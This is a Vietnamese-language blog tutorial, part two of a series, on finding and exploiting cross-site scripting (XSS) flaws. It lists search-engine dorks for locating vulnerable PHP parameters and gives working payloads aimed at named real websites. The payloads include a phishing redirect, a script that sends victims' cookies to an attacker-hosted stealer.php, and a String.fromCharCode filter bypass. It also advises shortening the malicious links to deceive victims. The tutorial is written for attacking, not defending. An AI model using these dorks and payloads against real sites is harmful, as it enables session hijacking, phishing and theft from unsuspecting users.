[Phần 2]Kiểm tra và khai thác XSS

- Trong phần thứ nhất XSS là gì ? Cách tìm và khai thác tôi đã nói sơ qua về XSS , trong phần này tôi sẽ giải thích phần còn lại của XSS bao gồm phương pháp thực hiện và phương pháp kiểm tra 1 site dính lỗi XSS
5. 1 số Dork XSS thông dụng :

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=

- Để kiểm tra site có dính lỗi XSS không chúng ta sẽ thử thêm đoạn : <script>alert("Check XSS")</script>
Ví dụ :

http://www.econedlink.org/economic-calendar.php?month=7&day=25%3Cscript%3Ealert%28%22Check%20XSS%20by%20VVidN%22%29%3C/script%3E

- Nhưng không phải lúc nào cũng vậy , một số phương pháp dùng để vượt qua bộ lọc mà tôi sẽ giới thiệu sắp tới sẽ bớt nhàm chán hơn .
- Ngoài ra chúng ta có thể chèn các đoạn HTML sau đó

http://www.econedlink.org/economic-calendar.php?month=7&day=25%22%3E%3Ciframe%20src=%22http://www.vvteam.blogspot.com%22%20height=400%20width=500%20frameborder=1%20align=center%3E%3C/iframe%3E

6. 1 số thao tác tấn công bằng XSS :
- Bạn có thể trỏ về 1 trang Fishing của bạn và làm gì thì tôi không cần nói .

http://www.econedlink.org/economic-calendar.php?month=7&day=25%3Cscript%3Ewindows.location=%22http://yoursite.com%22;%3C/script%3E

- Hoặc bạn có thể rút ngắn link lại bằng cách sử dụng Url Shorter : http://goo.gl/ để tránh victim phát hiện :D

- Đánh cắp Cookies :

http://www.econedlink.org/economic-calendar.php?month=7&day=25<script>document.location='www.yoursite.com/stealer.php?cookie='+escape(document.cookie);</script>

Với www.yoursite.com/stealer.php là nơi bạn sẽ lưu thông tin đánh cắp được !

7. Kỹ thuật vượt mặt bộ lọc :
- Ngoài những phương pháp kể trên , chúng ta phải biết bypass bộ lọc ví dụ như :

http://eastsideshowroom.com/calendar.php?month=5&year=2012%3Cscript%3Ealert%28%22Checked%20by%20VVidN%22%29%3C/script%3E

Ta thấy nó không hoạt động, vậy thử đổi string sang char thì như thế nào ?

http://eastsideshowroom.com/calendar.php?month=5&year=2012%3Cscript%3Ealert%28String.fromCharCode%2867,%20104,%20101,%2099,%20107,%20101,%20100,%2032,%2098,%20121,%2032,%2086,%2086,%20105,%20100,%2078%29%29%3C/script%3E

Ồ và nó đã vượt qua bộ lọc rồi .

Tất cả những gì bạn cần : 
1. Addon Hackbar dùng để hỗ trợ trong việc chuyển đổi string sang char ! 
2. 1 số site dùng để rút ngắn URL mục đích là lừa victim : 
http://tiny.cc/
http://www.shorturl.com/
http://tinyurl.com/
http://goo.gl/

Share This:

Tags:

XSS

• Prevoius
• Next